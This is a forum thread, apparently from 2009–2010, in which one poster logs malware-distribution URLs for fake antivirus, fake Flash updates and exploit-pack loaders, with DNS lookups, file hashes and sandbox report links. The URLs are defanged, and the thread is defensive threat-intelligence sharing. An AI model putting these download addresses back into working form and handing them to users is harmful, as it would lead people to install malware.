hxxp://top2009securityf.cn/download/Antivir-73c_2005-10.exe

$ dig top2009securityf.cn +short
93.174.93.34
88.198.160.57
93.174.93.117
89.248.162.141
204.12.252.101
93.158.114.63

$ md5sum Antivir-73c_2005-10.exe
692098170cfb7277fa2d83a8fc0e2195  Antivir-73c_2005-10.exe

http://www.virustotal.com/analisis/5cde2c4b9b37c19d8553cd6d9a101ae92e7fa409a90addd7eb7045c8f88e8c38-1260461187 2/41


top2009securityf.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 04:36:03 pm
Code: [Select]
hxxp://2009pluginmedia.com/AdobeFlashPlayer_Update.40056.exe

$ dig 2009pluginmedia.com +short
64.120.141.99

$ md5sum AdobeFlashPlayer_Update.40056.exe
0d15d43bc2533727c84373b288f8132b  AdobeFlashPlayer_Update.40056.exe

http://www.malwaredomainlist.com/mdl.php?search=64.120.141&colsearch=All&quantity=50
http://www.virustotal.com/analisis/bdcf53dadf689aeadd9058e7a3ae746564ef1d161f42dee67d1f31dd4a0d5ea4-1260462505 4/41
https://cwsandbox.org/?page=report&analysisid=1771534&password=iuerlgfrpl
http://www.threatexpert.com/report.aspx?md5=0d15d43bc2533727c84373b288f8132b


2009pluginmedia.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 15, 2009, 08:41:26 pm
Code: [Select]
hxxp://www.sendspace.com.ttkalasa.be/file/share/photo.exe

$ dig www.sendspace.com.ttkalasa.be +short
190.53.139.62
190.82.200.142
190.82.220.178
190.204.104.47
196.217.228.206
201.53.91.88
201.132.225.30
201.160.249.217
201.173.45.118
201.226.151.13
217.132.80.17
58.9.96.47
114.183.45.220
121.120.199.161
190.37.112.152

$ md5sum photo.exe
89fa4f680a3ff0971df0d8782f7acc0d  photo.exe

http://www.virustotal.com/analisis/03e43923658bfc991003d378e9d410705fbf46d344360e8257993ee8e53313ec-1260909549 7/40
https://cwsandbox.org/?page=report&analysisid=1874566&password=svtdhdieyt
http://www.threatexpert.com/report.aspx?md5=89fa4f680a3ff0971df0d8782f7acc0d


ttkalasa.be

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 16, 2009, 02:38:10 pm
Code: [Select]
hxxp://a7bestdefence.com/download/Antivir-b90b45_2006-54.exe

$ dig a7bestdefence.com +short
193.104.22.203
88.198.160.57

$ md5sum Antivir-b90b45_2006-54.exe
910eb411cfb59168a0194330a7ce21df  Antivir-b90b45_2006-54.exe

http://www.malwaredomainlist.com/mdl.php?search=193.104.22&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.160&colsearch=All&quantity=50

http://www.virustotal.com/analisis/93687ec39ed73c0f052c316ed8c564bf028dbb1368a4aa8dfd3b1ecfc00d0294-1260972779 0/41
http://www.threatexpert.com/report.aspx?md5=910eb411cfb59168a0194330a7ce21df
https://cwsandbox.org/?page=report&analysisid=1881693&password=keunsvihtu


a7bestdefence.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 16, 2009, 10:47:10 pm
Code: [Select]
hxxp://securityonlinevideo.net/hitin.php?land=20&affid=92400

$ dig securityonlinevideo.net +short
193.106.32.10

http://www.virustotal.com/analisis/c545d6c876e3c3dc2b78e9735f4d57b702eb2d4f55626517cc69205bed0cb3eb-1261003418 9/40
http://wepawet.iseclab.org/view.php?hash=52fb7f6078566e5bcf2c75e481bcb7e4&t=1261004257&type=js
http://anubis.iseclab.org/?action=result&task_id=1fca47f09ce3145a44de001457b027bfa


securityonlinevideo.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 17, 2009, 12:35:57 pm
Code: [Select]
hxxp://antyflu.net/hitin.php?land=20&affid=91801

$ dig antyflu.net +short
193.104.12.2

http://www.virustotal.com/analisis/99c7da8561da71e53c245b0b54ac729f3bd28ab05582a13a3c2d66a79fc64de6-1261048442 7/41
http://anubis.iseclab.org/?action=result&task_id=16727529c6de106a4196c073acffa63c9
http://wepawet.iseclab.org/view.php?hash=43fb4cd25f76ac4595561e1c8186967e&t=1261049291&type=js
https://cwsandbox.org/?page=report&analysisid=1890235&password=jsqpfciskv

antyflu.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 17, 2009, 11:39:25 pm
Code: [Select]
hxxp://newantyvirustool.net/hitin.php?land=20&affid=92800

$ dig newantyvirustool.net +short
193.104.153.245

http://www.malwaredomainlist.com/mdl.php?search=193.104.153&colsearch=All&quantity=50
http://wepawet.iseclab.org/view.php?hash=32210ef6d32bc07c22b88a69841bd5a1&t=1261093786&type=js
http://anubis.iseclab.org/?action=result&task_id=17443e9438c5a3f6465b1b51b185859da
http://www.virustotal.com/analisis/8ecd09f38683889764653fd2bce046f1a8b2bd22de16d3216664052b090bb9f8-1261092956 10/41


newantyvirustool.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 18, 2009, 07:56:23 pm
Code: [Select]
hxxp://twofinestutilites.com/liteplayer.45206.exe

$ dig twofinestutilites.com +short
64.120.141.5

$ md5sum liteplayer.45206.exe
a405340f40532107fbd7558f5cee0bcc  liteplayer.45206.exe

http://www.virustotal.com/analisis/580c78de2c3cd5ae1f605be5a9ce6bbde0c227729e6b8fb047896dca6a6f89ed-1261165900 6/40
http://anubis.iseclab.org/?action=result&task_id=1c9e34154bdb26cb49542ee690ef63944
https://cwsandbox.org/?page=report&analysisid=1904100&password=lsoqgsxtki
http://anubis.iseclab.org/?action=result&task_id=1c9e34154bdb26cb49542ee690ef63944&format=html


twofinestutilites.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 19, 2009, 03:50:11 am
Code: [Select]
hxxp://thescandan.com/downloader.php?affid=92003

$ dig thescandan.com +short
193.169.234.19

$ md5sum install.exe
00974b36ca8876cde9eee334150707e8  install.exe

http://www.virustotal.com/analisis/957c5ca099bf719a8683774f5e1c0d349fdacd21b9e60035e268741faeb45b69-1261194495 8/40
http://wepawet.iseclab.org/view.php?hash=91a87dcbb8a14d99be5e57467881c9ab&t=1261195430&type=js

thescandan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 21, 2009, 03:03:00 pm
Code: [Select]
hxxp://networksecurityinfo.com/downloader.php?affid=91109

$ dig networksecurityinfo.com +short
94.102.63.245

$ md5sum install.exe
8d997dc279887fb3e04fea8d085a9aee  install.exe

http://www.virustotal.com/analisis/bc874ddbc5467481b40cc6b5a9f0cdb290ba9ccb989a3865cf23e8c1b4d75ebe-1261407699 10/40
https://cwsandbox.org/?page=report&analysisid=1977185&password=nhzqvmjobf
http://www.threatexpert.com/report.aspx?md5=8d997dc279887fb3e04fea8d085a9aee


networksecurityinfo.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 21, 2009, 04:37:35 pm
Code: [Select]
hxxp://virusexamine.com/downloader.php?affid=34100

$ dig virusexamine.com +short
193.169.13.15

$ md5sum install.exe
6a4c8beae1aefa86a87b0795e267cb24  install.exe

http://www.virustotal.com/analisis/4e67a4948a3a08c6699fed5b25af5ed4a33764bca966a02919b6dccfec189137-1261413328 12/40
https://cwsandbox.org/?page=report&analysisid=1978525&password=phkjpjgnuu
http://www.threatexpert.com/report.aspx?md5=6a4c8beae1aefa86a87b0795e267cb24


virusexamine.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 21, 2009, 05:47:20 pm
Code: [Select]
hxxp://www.thumser-online.de/store/images/large/install_flash_player.exe

$ dig www.thumser-online.de +short
81.169.145.82

$ md5sum install_flash_player.exe
fa168bb0e6cf2e0cc937888b92f63416  install_flash_player.exe

http://www.virustotal.com/analisis/79e9a54d15d4e74c2674c778ed33700e2718766a1f98020c3889438957aaee7a-1261416462 5/41
http://anubis.iseclab.org/?action=result&task_id=1dd5e0e7ce59d94b40d27c8b4801b0979&format=html
https://cwsandbox.org/?page=report&analysisid=1979532&password=oncymhnwmz
http://www.threatexpert.com/report.aspx?md5=fa168bb0e6cf2e0cc937888b92f63416


thumser-online.de

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 22, 2009, 12:13:50 am
Code: [Select]
hxxp://free-scanner-spyware.biz/get.php?sc=1&id=259b4c25aa08557e7c8892c5d64253db

$ dig free-scanner-spyware.biz +short
193.106.32.40

http://www.virustotal.com/analisis/4e6286bc34b5c6fb92f1571760d304186c759eb24fdd008ca14a4949bb9e9e04-1261440681 24/40


free-scanner-spyware.biz


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 22, 2009, 08:36:25 pm
Code: [Select]
hxxp://softwaredate.net/flash-HQ-plugin.40069.exe

$ dig softwaredate.net +short
64.120.141.5

$ md5sum flash-HQ-plugin.40069.exe
e7838570a8f92d863f3d3af9baccfdab  flash-HQ-plugin.40069.exe

http://www.virustotal.com/analisis/55d7e75df1746493c92443734238677d1488096bc9089e0b52ca5b2261b2ddc5-1261513824 5/40
https://cwsandbox.org/?page=report&analysisid=1993816&password=ctepcqwsyz
http://anubis.iseclab.org/?action=result&task_id=1711b7bbdd8a12574319ce2973cf32b98&format=html
http://www.threatexpert.com/report.aspx?md5=e7838570a8f92d863f3d3af9baccfdab


softwaredate.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 22, 2009, 08:54:32 pm
Code: [Select]
hxxp://statcstat.com//news/ld.php?e=pdf

$ dig statcstat.com +short
193.104.22.153

$ md5sum op.exe
a7e33d767b2f39ddba372dadf4dfd057  op.exe

http://www.virustotal.com/analisis/7dab670b14c34a577f47371b1bb8a4854b6bf7ccfad7cd720f309ca00bf002c2-1261514926 2/41
http://anubis.iseclab.org/?action=result&task_id=1afb9aafbb22de4343db974bd3bdbdefd
https://cwsandbox.org/?page=report&analysisid=1993940&password=fggfzwljnj
http://www.threatexpert.com/report.aspx?md5=a7e33d767b2f39ddba372dadf4dfd057


statcstat.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 24, 2009, 02:32:50 pm
Code: [Select]
hxxp://cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320

$ dig cjbtiybcpnf.com +short
72.51.47.21

http://www.malwaredomainlist.com/mdl.php?search=72.51.47&colsearch=All&quantity=50

http://www.virustotal.com/analisis/495b848a01b5fee685508d4782ba099cd60156fad3aaec694f4b97c8a023421c-1261646823 6/41


cjbtiybcpnf.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 26, 2009, 04:26:34 pm
Code: [Select]
hxxp://spywareremovediretto.com/downloader.php?affid=93101

$ dig spywareremovediretto.com +short
193.104.153.2

http://www.virustotal.com/analisis/e5ea0ebb4d0bd98882eb4a40a8c6dc372217ec65aa9360fc18418b0c99cb9077-1261844636 2/41
http://anubis.iseclab.org/?action=result&task_id=1efe6552a82c1af745dc365da0f748dc0


spywareremovediretto.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 28, 2009, 05:30:29 pm
Code: [Select]
hxxp://macaples.in/my_usa/load.php?spl=ActiveX_pack

$ dig macaples.in +short
115.100.250.114

http://www.virustotal.com/analisis/c0582cdd20e4c9dd0787d95f3f4178bc3ad9312389b1c5ca211b1db2e6a3ed48-1262021030 5/40
http://anubis.iseclab.org/?action=result&task_id=179293bcca358eeb4794c20bdc637dd75&format=html


macaples.in

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 28, 2009, 06:04:34 pm
Code: [Select]
hxxp://macaples.in/my_usa/pdf.php

http://www.virustotal.com/analisis/5faf913b0e252afadeb738543450b3d579ee25cb1e8e6eb4f88cfac89f975314-1262021303 2/41

(see previous post)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 29, 2009, 07:57:13 pm
Code: [Select]
hxxp://malwaretake.com/downloader.php?affid=93101

$ dig malwaretake.com +short
193.104.153.2

http://anubis.iseclab.org/?action=result&task_id=130fa5ef209cf627481879761f409a686
http://www.virustotal.com/analisis/71b5ffe784f21955ebf3b8dfa483a09249cc209466e904ccba259f078ca4f26c-1262116493 9/41


malwaretake.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 30, 2009, 05:26:44 pm
Code: [Select]
hxxp://antivirusscanstore.com/downloader.php?affid=93101

$ dig antivirusscanstore.com +short
193.104.153.2

http://anubis.iseclab.org/?action=result&task_id=15d241f0ebc17262415f5922d50104894
http://www.virustotal.com/analisis/d844f07b019d3d82f012e2210a68765db3353d4951ee0842cc9c8aabefad664e-1262193852 14/41


antivirusscanstore.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 31, 2009, 03:20:41 pm
Code: [Select]
hxxp://scanlifetimeonline.com/downloader.php?affid=05300

$ dig scanlifetimeonline.com +short
62.90.136.210

http://www.virustotal.com/analisis/62638a1beb60e047ab5e77fad3958ba1e828aae16a96a192b665eebbd1ecc998-1262272427 13/36
http://anubis.iseclab.org/?action=result&task_id=18d2e0223df70eda4452b3caa969362cc


scanlifetimeonline.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 04, 2010, 04:42:10 pm
Code: [Select]
hxxp://pro-defenderq.com/download/Setup77742_2042-4.exe

$ dig pro-defenderq.com +short
66.232.102.69
91.212.226.188

$ md5sum Setup77742_2042-4.exe
7d311af2a4fa1918560e0ea9b7daf368  Setup77742_2042-4.exe

http://www.virustotal.com/analisis/262dd0615db46ac333e5f803f30ac9b0331de76eb0c22908dc769ac511238f64-1262622328 2/41
http://anubis.iseclab.org/?action=result&task_id=1fadcaef59f801494cd866a57a1655f43&format=html


pro-defenderq.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 05, 2010, 11:00:06 pm
Code: [Select]
hxxp://www1.hot-cleanofyourpc.com/build7_287.php?cmd=getFile&counter=1&p=p52dcWpsb1%2FCj8bYboBwgHle0KCfZ1bVoKDb2YmHWJjOxaCbkX1%2Ba16orKWeZpWeZWhjlWOZmI6Io6THodjXoGJdo3OL1cytnpl2Wp6dpJ6eU9rPlqdqWqaroV6UZmKdX5yXmWldlZmi


$ dig www1.hotcleanof-yourpc.net +short
89.248.160.157

$ md5sum setup_build7_287.exe
3dc2cedece109d0353a94da09d8120c1  setup_build7_287.exe

http://www.virustotal.com/analisis/18ddb7dc6ff61ddcada96d65e7c5a0b80009823f3609683dc6fb6f798777cefd-1262732306 8/41


www1.hotcleanof-yourpc.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 08, 2010, 06:55:14 pm
Code: [Select]
hxxp://www1.best-pcprotection.com/build19102_287.php?cmd=getFile&counter=9&p=p52dcWpsb1%2FCj8bYboBwgHle0KCfYWmXXZWK0qR0qay9sYmbm5h2lpd9fXCHodjSbpZelmZumo6TYmebU9bYxKWspXOL0qBfpp2toJ1xXp%2FKmcmjV6aWmal1iqHVbWGYY5WdmmZoam6LxMZ2

Referer: hxxp://www1.protect-my-system.net/?p=p52dcWpsb1%2FCj8bYboBwgHle0KCfYWmXXZWK0qR0qay9sYmbm5h2lpd9fXCHodjSbpZelmZumo6TYmebU9bYxKWspXOL0qBfpp2toJ1xXp%2FKmcmjV6aWmal1iqHVbWGYY5WdmmZoam6LxMZ2

$ dig www1.best-pcprotection.com +short
89.248.160.158

$ dig www1.protect-my-system.net +short
89.248.160.153

$ md5sum packupdate_build19102_287.exe
4912961c36306d156e4e2b335c51151b  packupdate_build19102_287.exe

http://www.virustotal.com/analisis/1047249ad5922274348d1fbc13ef675ee6aa13a3a4d7c03e646a2c4587a1bb9c-1262976540 7/41


best-pcprotection.com
protect-my-system.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 08, 2010, 08:40:33 pm
Code: [Select]
hxxp://statcntr.com/news/ld.php?e=pdf

$ dig statcntr.com +short
193.104.22.153

$ md5sum op.exe
c803fc126b9a63a25a48475b52c4caea  op.exe

http://www.virustotal.com/analisis/6e008eaa0e84abef124413aa9ac940523a005c77d6c9055fbc0b8ae6875d83b1-1262982756 14/41


statcntr.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 12, 2010, 10:24:07 pm
Code: [Select]
hxxp://www1.best-pcdefender.com/build6_287.php?cmd=getFile&counter=1&p=p52dcWpsb1%2FCj8bYbnx9d3le0KCfZlbVoKDb2YmHWJjOxaCbkX1%2Ba16orKWek5WdZZZjmmRqlWCIo6THodjXoGJdo3PVysatp6aep1ijnlnMkt3ZmZmOVJWn0JKCoKLLlNHF0aVdpp%2FZzch2WJqioJ1xXq%2FKktujV6SgcWNqmmCVYmWdX5SKxpR0

$ dig www1.best-pcdefender.com +short
89.248.160.153

$ md5sum packupdate_build6_287.exe
9bc59c7fab03e27a0d527fbca352099c  packupdate_build6_287.exe

http://www.virustotal.com/analisis/b291101a733cb656f39c3b85a887e2f5b9730a8564c09d3d80b49560c23f0458-1263334930 1/41


best-pcdefender.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 13, 2010, 03:03:53 am
Code: [Select]
hxxp://3-onlinescanner.com/download/Setup_2002-8.exe

$ dig 3-onlinescanner.com +short
66.232.102.65
94.228.208.59

$ md5sum Setup_2002-8.exe
2e1ab9f8c723b8b657b17d77e5c7e84e  Setup_2002-8.exe

http://www.virustotal.com/analisis/b76d41e3233b1eaceacbdd4a61b726c00c416903eaac88d311b89633056e1d65-1263338143 3/41


3-onlinescanner.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 13, 2010, 07:38:37 pm
Code: [Select]
hxxp://kill-spywarem2.com/download/Setup_40s5.exe

$ dig kill-spywarem2.com +short
193.104.22.201
213.175.221.46

$ md5sum Setup_40s5.exe
abf693010b11ff7c6ac3ec297fc99904  Setup_40s5.exe

http://www.virustotal.com/analisis/a1c0b23dcfa9bc10f2cdb55c1358c5bd7c01c903a2aa9829f205b73137d30e89-1263410660 4/40


kill-spywarem2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 13, 2010, 07:39:37 pm
Code: [Select]
hxxp://kill-spywarem7.com/download/Setup_103.exe

$ dig kill-spywarem7.com +short
193.104.22.201
213.175.221.46

$ md5sum Setup_103.exe
abf693010b11ff7c6ac3ec297fc99904  Setup_103.exe

http://www.virustotal.com/analisis/a1c0b23dcfa9bc10f2cdb55c1358c5bd7c01c903a2aa9829f205b73137d30e89-1263410660 4/40


kill-spywarem7.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 15, 2010, 12:48:19 pm
Code: [Select]
hxxp://alwaysinwork.com/kvusa/loadjavad.php?page=10

$ dig alwaysinwork.com +short
213.108.56.18

$ md5sum d7b67
d3d9240c64d2d4515ec2d3d584ec0d12  d7b67

http://www.virustotal.com/analisis/4c19907d0ca2876a0fd095462c12ef46a45307f5f7de17dc156ec84188ff3243-1263558981 2/41

http://anubis.iseclab.org/?action=result&task_id=1ee0d7b2a971ac904e542a29aac460e95&format=html

https://cwsandbox.org/?page=report&analysisid=2522400&password=dtkycibdis


alwaysinwork.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 18, 2010, 03:48:14 am
Code: [Select]
hxxp://www.ancisoft.com/file/xkvpsetup.exe

$ dig www.ancisoft.com +short
221.231.138.89

$ md5sum xkvpsetup.exe
5fb51d678665b42c6cb2e34ae73346fe  xkvpsetup.exe

http://www.virustotal.com/analisis/8f517de0a8b8f38571ab1708d4f67b7e046018bc64121644a7b2470b16f59147-1263786171 13/41


ancisoft.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 19, 2010, 04:01:02 pm
Code: [Select]
hxxp://www.teu8.cn/c.exe

$ dig www.teu8.cn +short
174.139.3.50

$ md5sum c.exe
e7bf0e74a9ab882b0430395f1c196913  c.exe

http://www.virustotal.com/analisis/b8c9ac6813ccae8f81abc9ab7653e736a81b3ef1f11a3810c1cc04d6f4310ec7-1263916378 31/41


teu8.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 19, 2010, 10:24:41 pm
Look at the Referrer -- "a.photobucket.com"

Code: [Select]
192.168.1.1 - - [19/Jan/2010:21:53:52 +0000] "GET http://google.com.analytics.sbeqpirscun.com/nte/TREST11.exe HTTP/1.1" - - "http://a.p
hotobucket.com/hserver/random=185831/pageid=307661826/area=PB_AL_U_FULL/aamsz=BANNER/age=25/zip=19506/gender=F/login=Y/Camera=ResearchIn
MotionBlackBerry8110,NIKONCORPORATIONNIKOND3,CanonCanonPowerShotA520/mobile_carrier=AT&T/email_domain=COM/anprice=85" "Mozilla/4.0 (comp
atible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

$ dig google.com.analytics.sbeqpirscun.com +short
64.150.187.239


http://www.virustotal.com/analisis/c4a5e9d4635e863ebcea026319206143a99b4c301b9c68cf2d6aa7fc8fb0b93b-1263934871 4/40



google.com.analytics.sbeqpirscun.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 25, 2010, 06:26:45 pm
Code: [Select]
hxxp://statacon.com/news/ld.php?e=pdf

$ dig statacon.com +short
193.104.22.153

$ md5sum op.exe
199f7c473276ab2d2ea1d159056ec610  op.exe

http://www.virustotal.com/analisis/0329c5130681d0f1e56c7964c8cf121d222a8c76f0dae2ab2a26c01f8f0e7472-1264443673 3/39


statacon.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 02, 2010, 05:42:31 pm
Code: [Select]
hxxp://google.analytics.com.jestywtvadgj.info/kav/kav3.exe

$ dig google.analytics.com.jestywtvadgj.info +short
174.142.53.148

http://www.virustotal.com/analisis/ff5fbf07fe9d1d8ed3bd287327e7b215a9e400ed4fe0037a37f0854739779a12-1265131372 3/40

http://wepawet.iseclab.org/view.php?hash=a0e3e250e1cf7f02c54258507edf7178&t=1265131760&type=js


google.analytics.com.jestywtvadgj.info

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 03, 2010, 01:58:42 am
Code: [Select]
hxxp://banner.titanpoker.com/installer/casino/SetupPoker_f80ad.exe

$ dig banner.titanpoker.com +short
69.90.74.226
66.199.155.194

$ md5sum SetupPoker_f80ad.exe
1dbf65e403c23a53bf349b976aaea44a  SetupPoker_f80ad.exe

http://www.virustotal.com/analisis/82fe9f1fe166e1c7ea22b38c5c23d1aaa0273f6ec09c3bade2205a2122b16a75-1265161220 12/39


titanpoker.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 03, 2010, 02:07:33 pm
Code: [Select]
hxxp://google.analytics.com.jtmqypcgt.info/nte/AVORP1KAV3%20.asp/eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010

$ dig google.analytics.com.jtmqypcgt.info +short
174.142.53.148

$ md5sum eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010
6c672682db19ad638a8b17738a4df288  eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010

$ file eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010
eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

http://www.virustotal.com/analisis/84a08ae7d2aecda94e022d526ef62a30a9233cb512ee681496925424e55e7209-1265193029 13/40


google.analytics.com.jtmqypcgt.info

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 03, 2010, 02:55:11 pm
Code: [Select]
hxxp://letitbit.zinnko.pl/XXXXXXXXXXXXXXXXXXX/PhotoArchive.exe

$ dig letitbit.zinnko.pl +short
58.27.166.149
69.79.104.11
75.172.59.17
93.177.185.72
94.240.225.56
95.56.84.252
112.202.136.44
116.111.184.185
117.205.52.39
189.78.52.247
189.196.21.17
190.39.129.16
190.213.162.152
201.43.68.23
41.141.51.123

$ md5sum PhotoArchive.exe
0448e3d62da49e65be650e441b601714  PhotoArchive.exe

http://www.virustotal.com/analisis/04aef82e6036c97c1287dec5f8789384b3ab539210750f262b4d4715835c37c5-1265207237 6/40


letitbit.zinnko.pl

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 17, 2010, 11:09:04 am
Code: [Select]
hxxp://hd.yourweekends.net/Flash.Player.HD.v11.exe

$ dig hd.yourweekends.net +short
89.248.168.120

$ md5sum Flash.Player.HD.v11.exe
5184bac49bec6245de467dede16648a1  Flash.Player.HD.v11.exe

http://www.virustotal.com/analisis/302f9cef52017c8a7ee0facbe7f580021ac094ab31686fb19c9769bfe2bafa99-1266376705 8/40


yourweekends.net
+
buy-security-essentials.com                                                                                             
get-key-se10.com                                                                                                       
buy-security-essentials.com                                                                                             
download-soft-package.com                                                                                               
download-software-package.com                                                                                           
get-key-se10.com                                                                                                       
is-software-download.com   

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 19, 2010, 07:23:02 pm
Code: [Select]
hxxp://google.analytics.com.byuigracdnjj.info/lee/TATRA10.exe

$ dig google.analytics.com.byuigracdnjj.info +short
72.51.41.155

http://anubis.iseclab.org/?action=result&task_id=1d16ee2329edbc3f459997192802c2d51

http://www.virustotal.com/analisis/604e53e3389aada7fcc5fa7f41bb5e981c0d206a9d36587ac749c7db82a45a22-1266603029 2/40


byuigracdnjj.info
+
windows-liveaver.com   
antispyware-comp.com   
antiviruscare-com.com   
pc-guard2010.com       
spyware-destroyerone.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 22, 2010, 08:15:42 pm
Code: [Select]
hxxp://moremediaplugins.net/flash-HQ-plugin.48421.exe

$ dig moremediaplugins.net +short
62.212.66.108

$ md5sum flash-HQ-plugin.48421.exe
b13d7b310b2cfe432d3df4f25066596d  flash-HQ-plugin.48421.ex

http://www.virustotal.com/analisis/fbcd21eaae97a4f0d4c2b4551c62ea38ee50353810c67515913d7a48064fa162-1266869627 5/40


moremediaplugins.net